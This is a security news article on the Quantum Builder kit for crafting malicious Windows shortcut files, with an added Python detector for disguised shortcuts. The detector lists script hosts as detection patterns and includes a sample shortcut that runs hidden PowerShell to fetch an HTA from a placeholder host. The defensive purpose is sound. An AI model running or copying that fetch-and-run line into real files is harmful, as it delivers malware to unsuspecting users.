Creating compromised shortcuts made possible by the Quantum Builder

July 7, 2022
Creating Compromised Shortcuts Quantum Builder Malware Windows

Researchers discovered a malware kit called Quantum Builder that lets threat actors build malicious shortcut ([.]LNK) files. The tool is sold by its developers on underground markets and cybercriminal forums.

The tool is rented out at several price tiers. One month of access costs about $200, and a two-month rental is offered at $375. Buyers who pay about a thousand dollars get access for half a year, and permanent access to the tool costs approximately $1500.

The Quantum Builder lets its users impersonate several file extensions and choose from 300 icons for the compromised link files. The tool also helps its operators bypass UAC and Windows SmartScreen.

The kit also supports several payloads per LNK file and can generate ISO and HTA payloads. Researchers first spotted a sample of this malware kit last May; they did not immediately recognize the tool because it was disguised as a harmless text file.

The Lazarus group may be behind the Quantum Builder.

The Quantum Builder has been linked to the Lazarus threat group because it shares some source code with the code the group uses in its payload-delivery operations.

Based on reports, the LNK extension is hidden by the Windows operating system itself. The operators exploit this deliberately: a file named “file_name[.]txt[.]lnk” is displayed as “file_name[.]txt” only, so the LNK suffix never appears in the initial display.

Because of this behavior, users are far more likely to be deceived into opening the file.

If a user opens the LNK file, it automatically runs PowerShell code that the threat actors can use to perform a range of actions. In this instance, the LNK shortcut launches an HTML Application (HTA) file hosted on Quantum’s website through a legitimate Windows utility.
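The two behaviors described above, Explorer hiding the .lnk suffix and the shortcut target pointing at a script host, are what a defender can check for. The following is an added example, not code from the article or from the Quantum Builder kit: the Shell Link header bytes come from the public Shell Link format, while the script-host list, the document-extension list and the sample shortcut are assumptions constructed for this example.

```python
import os
import re

# First 20 bytes of a Windows Shell Link file: HeaderSize 0x0000004C followed by
# LinkCLSID {00021401-0000-0000-C000-000000000046} in its on-disk byte order.
SHELL_LINK_MAGIC = bytes.fromhex("4c000000011402000000000000c000000000000046")

# Script hosts a shortcut target may point at. The article names only PowerShell
# and "an authentic Windows utility"; this wider list is an assumption of the example.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe", "cmd.exe"}
# Document-like extensions that make a ".xxx.lnk" name look like a plain file (assumed list).
DOCUMENT_EXTS = {".txt", ".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png"}


def is_shell_link(data: bytes) -> bool:
    """True when the file content starts with a valid ShellLinkHeader."""
    return data[:len(SHELL_LINK_MAGIC)] == SHELL_LINK_MAGIC


def displayed_name(filename: str) -> str:
    """Name as Explorer renders it: the .lnk suffix is always hidden."""
    root, ext = os.path.splitext(filename)
    return root if ext.lower() == ".lnk" else filename


def lnk_risk_reasons(filename: str, target: str, arguments: str = "") -> list:
    """Return the reasons a shortcut looks like a disguised script launcher (empty if none)."""
    reasons = []
    shown = displayed_name(filename)
    if shown != filename and os.path.splitext(shown)[1].lower() in DOCUMENT_EXTS:
        reasons.append(f"double extension: Explorer shows '{shown}'")
    host = os.path.basename(target.replace("\\", "/")).lower()
    if host in SCRIPT_HOSTS:
        reasons.append(f"target is script host {host}")
    tokens = [t.lower() for t in arguments.split()]
    for i, tok in enumerate(tokens):
        opt = tok[1:] if tok.startswith("-") else ""
        # powershell.exe accepts -e, -ec and any unambiguous prefix of -EncodedCommand
        if opt and (opt == "ec" or "encodedcommand".startswith(opt)):
            reasons.append("encoded PowerShell command")
        if opt and "windowstyle".startswith(opt) and i + 1 < len(tokens) and tokens[i + 1] == "hidden":
            reasons.append("hidden window")
    if re.search(r"https?://", arguments, re.IGNORECASE):
        reasons.append("remote URL in arguments")
    return reasons


# Constructed sample shortcut metadata (not a real Quantum Builder artifact).
SAMPLE = {
    "filename": "invoice.txt.lnk",
    "target": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "arguments": '-NoP -W Hidden -c "start http://example.invalid/page.hta"',
}
```

Feed the function with the TargetPath and Arguments read from real shortcuts (for example via the WScript.Shell COM object) to triage a mailbox or download folder.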

A tool built solely for creating malicious LNK files reflects the growing use of compromised LNK files. Multiple reports also say that LNK-based campaigns are attracting the attention of several other threat groups. The availability of this kit could soon allow additional threat actors to carry out this kind of attack.
